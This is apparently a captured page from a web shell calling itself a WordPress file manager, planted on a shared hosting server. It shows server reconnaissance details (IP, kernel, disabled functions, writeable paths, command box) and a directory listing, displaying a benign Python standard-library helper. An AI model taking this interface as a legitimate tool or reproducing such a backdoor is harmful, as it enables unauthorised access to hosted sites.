GRAYBYTE WORDPRESS FILE MANAGER7208

Server IP : 198.54.121.189 / Your IP : 216.73.216.224
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/alt/python311/lib64/python3.11/importlib/resources/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/alt/python311/lib64/python3.11/importlib/resources//_itertools.py
from itertools import filterfalse

from typing import (
    Callable,
    Iterable,
    Iterator,
    Optional,
    Set,
    TypeVar,
    Union,
)

# Type and type variable definitions
_T = TypeVar('_T')
_U = TypeVar('_U')


def unique_everseen(
    iterable: Iterable[_T], key: Optional[Callable[[_T], _U]] = None
) -> Iterator[_T]:
    "List unique elements, preserving order. Remember all elements ever seen."
    # unique_everseen('AAAABBBCCDAABBB') --> A B C D
    # unique_everseen('ABBCcAD', str.lower) --> A B C D
    seen: Set[Union[_T, _U]] = set()
    seen_add = seen.add
    if key is None:
        for element in filterfalse(seen.__contains__, iterable):
            seen_add(element)
            yield element
    else:
        for element in iterable:
            k = key(element)
            if k not in seen:
                seen_add(k)
                yield element

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 13 2025 08:37:02
root / linksafe
0755
__pycache__
--
May 13 2025 08:37:02
root / linksafe
0755
__init__.py
0.494 KB
April 08 2025 14:15:29
root / linksafe
0644
_adapters.py
4.398 KB
April 08 2025 14:15:29
root / linksafe
0644
_common.py
2.823 KB
April 08 2025 14:15:29
root / linksafe
0644
_itertools.py
0.863 KB
April 08 2025 14:15:29
root / linksafe
0644
_legacy.py
3.412 KB
April 08 2025 14:15:29
root / linksafe
0644
abc.py
4.464 KB
April 08 2025 14:15:29
root / linksafe
0644
readers.py
3.474 KB
April 08 2025 14:15:29
root / linksafe
0644
simple.py
3.05 KB
April 08 2025 14:15:29
root / linksafe
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF